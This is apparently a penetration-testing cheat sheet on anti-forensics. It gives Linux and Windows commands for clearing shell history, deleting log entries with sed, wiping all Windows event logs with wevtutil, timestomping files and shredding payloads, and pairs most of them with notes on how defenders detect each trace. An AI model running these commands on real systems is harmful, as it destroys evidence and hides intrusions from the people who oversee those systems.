ANTI-FORENSICS
# Clear evidence of your presence (used in pentests to test detection)
# NOTE: In a real pentest, always discuss log clearing with the client beforehand — it destroys evidence they may need
# LINUX — Clear command history
# history -c drops the in-memory list; -w then writes that (now empty) list to $HISTFILE
history -c && history -w
# Pointing HISTFILE at /dev/null, or unsetting it, stops bash from saving history on exit;
# either line alone is enough — the unset is redundant after the export
export HISTFILE=/dev/null
unset HISTFILE
# Or set before starting:
export HISTSIZE=0
# DETECTION: only the shell's own history file is affected — auditd execve records, a
# PROMPT_COMMAND/syslog shell-logging hook, or session recording still capture every command
# LINUX — Clear specific log entries
# sed -i does not edit in place: it writes a new file and renames it over the old one, so the
# log's inode, mtime and ctime all change, and a daemon that still holds the old file open keeps
# writing to the now-unlinked inode (readable via /proc/<pid>/fd until it closes) — both are
# forensic artifacts; journald, remote syslog and SIEM copies are untouched
# Auth log (SSH logins):
sed -i '/YOUR_IP/d' /var/log/auth.log
# Web access log:
sed -i '/YOUR_IP/d' /var/log/apache2/access.log
# Syslog:
sed -i '/suspicious_process/d' /var/log/syslog
# LINUX — Timestomping (modify file timestamps)
touch -t 202001010000.00 /tmp/malware.sh # set to Jan 1 2020 (-t format is [[CC]YY]MMDDhhmm[.ss])
touch -r /bin/ls /tmp/malware.sh # copy timestamps from /bin/ls
# DETECTION: touch sets only atime/mtime; the inode ctime is set to the current time by the
# touch itself and cannot be written from userspace, so `stat` showing an mtime earlier than
# the ctime is a classic timestomping indicator
# LINUX — Shred file (overwrite before delete)
shred -u -z -n 3 /tmp/payload.sh
# -u = delete after overwriting, -n 3 = overwrite 3 times, -z = final pass of zeros so the
# file does not obviously look shredded
# CAVEAT (from shred's own man page): in-place overwriting is not reliable on journaling
# (ext3/ext4 data=journal), copy-on-write (btrfs, ZFS) or snapshotted filesystems, nor on SSDs
# with wear levelling — old content may survive, and the shred invocation itself is still
# visible to auditd/process auditing
# WINDOWS — Clear event logs (requires admin)
# DETECTION: clearing is itself logged — the first event written after a clear is Security
# event 1102 ("The audit log was cleared") for the Security log and System event 104 for the
# other logs, and both record the clearing account; they are among the highest-fidelity SIEM
# signals for this technique. Forwarded (WEF/SIEM) copies and .evtx files captured in Volume
# Shadow Copies are unaffected.
wevtutil cl System
wevtutil cl Security
wevtutil cl Application
# Clear all logs:
for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
# WINDOWS — Clear PowerShell history
# Removes PSReadLine's persisted history file; Clear-History only empties the current
# session's in-memory list
Remove-Item (Get-PSReadLineOption).HistorySavePath -Force
Clear-History
# DETECTION: neither command touches Script Block Logging (event 4104), Module Logging or
# PowerShell transcription, which — if enabled — already hold every command, including these two
# WINDOWS — Timestomping with PowerShell
$file = Get-Item "C:\temp\malware.exe"
$file.CreationTime = "01/01/2020 00:00:00"
$file.LastWriteTime = "01/01/2020 00:00:00"
$file.LastAccessTime = "01/01/2020 00:00:00"
# DETECTION: these setters rewrite only the $STANDARD_INFORMATION timestamps in the MFT; the
# $FILE_NAME attribute keeps the original values, so $SI older than $FN, or whole-second
# values with zeroed sub-second precision, flag the file. The USN journal and Sysmon event 2
# (file creation time changed) also record the change.
# DETECTION (blue team):
# A gap in log timestamps indicates log clearing
# Prefetch files still exist even after log clearing
# Windows Volume Shadow Copies may contain original logs
# Forwarding logs to a SIEM as they are written preserves them even if the local copies are cleared